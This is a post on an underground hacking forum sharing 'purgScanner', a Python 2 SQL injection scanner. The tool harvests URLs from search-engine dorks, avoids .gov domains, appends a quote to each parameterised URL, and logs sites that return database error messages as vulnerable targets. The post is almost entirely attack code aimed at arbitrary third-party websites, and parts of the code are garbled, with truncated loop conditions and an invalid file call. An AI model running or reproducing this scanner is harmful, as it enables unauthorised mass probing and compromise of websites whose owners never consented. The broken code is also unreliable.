HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Phyton SQLi Scanner by rCom

Status
Not open for further replies.
S

sQuo

~ KillmeMories ~
Shadow
User
Joined
Oct 16, 2011
Messages
5,851
Reputation
0
Reaction score
22,904
Points
688
Credits
0
‎13 Years of Service‎
24%
# ___ __ _________ ____ _/ /____ ______ __# / _ \/ // / __/ _ `/ _ `/ __/ _ \/ __/ // /

# / .__/\_,_/_/ \_, /\_,_/\__/\___/_/ \_, /

# /_/ /___/ /___/

# ___________ _ __

# SQLi Scanner by rCom / __/ __/ -_) |/|/ /

# [email protected] \__/_/ \__/|__,__/

#

#####################################################
Click to expand...


Code: 
>#!/usr/bin/python
# ___ __ _________ ____ _/ /____ ______ __
# / _ \/ // / __/ _ `/ _ `/ __/ _ \/ __/ // /
# / .__/\_,_/_/ \_, /\_,_/\__/\___/_/ \_, /
# /_/ /___/ /___/
# ___________ _ __
# SQLi Scanner by rCom / __/ __/ -_) |/|/ /
# [email protected] \__/_/ \__/|__,__/
#
#####################################################

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os
from random import choice
from optparse import OptionParser
os.system(['clear','cls'][os.name == 'nt'])
threads = []
numthreads = 8
timeout = 4
socket.setdefaulttimeout(timeout)
version = '0.1a'
ldm = 'jun_22_09'

rSA = [2,3,4,5,6]

CXdic = {'blackle': '013269018370076798483:gg7jrrhpsy4',
'ssearch': '008548304570556886379:0vtwavbfaqe',
'redfront': '017478300291956931546:v0vo-1jh2y4',}

SQLeD = {'MySQL(Syntax)': 'error in your SQL syntax',
'MySQL(fetch_array)': 'mysql_fetch_array',
'MySQL(fetch_assoc)': 'mysql_fetch_assoc',
'MySQL(num_rows)': 'mysql_num_rows',
'MSSQL_OLEdb': 'Microsoft OLE DB Provider',
'MSSQL_Uqm': 'Unclosed quotation mark',
'MS-Access_ODBC': 'ODBC Microsoft Access Driver',}


filetypes = ['php','php2','asp','aspx','jsp','htm','html']

header = ['Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)']

gnum = 100

def searchIt(go_dork,go_search,go_ftype,maxc):
uRLS = []
counter = 0
while counter jar = cookielib.FileCookieJar("cookies")
query = 'q='+go_dork+'+'+go_ftype
results_web = 'http://www.google.com/cse?'+go_search+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'
request_web = urllib2.Request(results_web)
agent = random.choice(header)
request_web.add_header('User-Agent', agent)
opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
text = opener_web.open(request_web).read()
strreg = re.compile('(?names = strreg.findall(text)
counter += 100
for name in names:
if name not in uRLS:
if re.search(r'\(', name) or re.search("pass
elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name):
pass
else:
uRLS.append(name)
tmpList = []; finalList = []
for entry in uRLS:
try:
t2host = entry.split("/",3)
domain = t2host[2]
if domain not in tmpList and "=" in entry:
finalList.append(entry)
tmpList.append(domain)
except:
pass
print "\n[!] - Starting scan please wait...."
return finalList

class injThread(threading.Thread):
def __init__(self,hosts):
self.hosts=hosts;self.fcount = 0
self.check = True
threading.Thread.__init__(self)

def run (self):
urls = list(self.hosts)
for url in urls:
try:
if self.check == True:
ClassicINJ(url)
else:
break
except(KeyboardInterrupt):
self.fcount+=1

def stop(self):
self.check = False


def ClassicINJ(url):
EXT = "'"
host = url+EXT
try:
source = urllib2.urlopen(host).read()
for type,eMSG in SQLeD.items():
if re.search(eMSG, source):
print "\n[!] - Found: ", host
print "[!] - Error: ", type, "\n"
savefile = "vulns.txt"
saved = open(savefile, "a")
saved.write(host+'\n')
saved.remove_duplicates()
saved.close()
else:
pass
except:
print "[?] - Trying: ", host
parser = OptionParser()
parser.add_option("-d" ,type='string', dest='dork',action='store', help="Dork: dork to search for i.e: index.php?id=")
parser.add_option("-f", type='string', dest='filetype',action='store', default='php', help="Filetype: Type of file i.e php,asp,aspx (def: php)")
parser.add_option("-e", type='string', dest='engine', action='store', default='blackle', help="Search: Engine to use blackle,ssearch,redfront (def: blackle)")
parser.add_option("-m", type='string', dest='maxcount',action='store',default='500', help="Results: Maximum number of results to return (def: 500)")
(options, args) = parser.parse_args()
print "\t\t\t+##################################+"
print "\t\t\t# #"
print "\t\t\t# purgScanner #"
print "\t\t\t# coded by rCom #"
print "\t\t\t# -h for help #"
print "\t\t\t# #"
print "\t\t\t+##################################+"

if options.dork != None:
print "\n\n[!] | Dork: \t",options.dork.upper()
go_dork = 'inurl:'+options.dork

if options.dork != None:
if options.filetype in filetypes:
go_ftype = 'inurl:'+options.filetype
else:
go_ftype = 'inurl:php'

go_search = 'engine:'+options.engine.upper()
print "[!] | Type: \t"+options.filetype.upper()
print "[!] | Engine: \t"+options.engine.upper()
print "\n[!] Starting search please wait...."

cuRLS = searchIt(go_dork,go_search,go_ftype,options.maxcount)
fin = True
while fin == True:
i = len(cuRLS) / int(numthreads)
m = len(cuRLS) % int(numthreads)
z = 0
if len(threads) for x in range(0, int(numthreads)):
sliced = cuRLS[x*i:(x+1)*i]
if (z sliced.append(cuRLS[int(numthreads)*i+z])
z += 1
thread = injThread(sliced)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
sys.exit()
 
Status
Not open for further replies.
Back
Top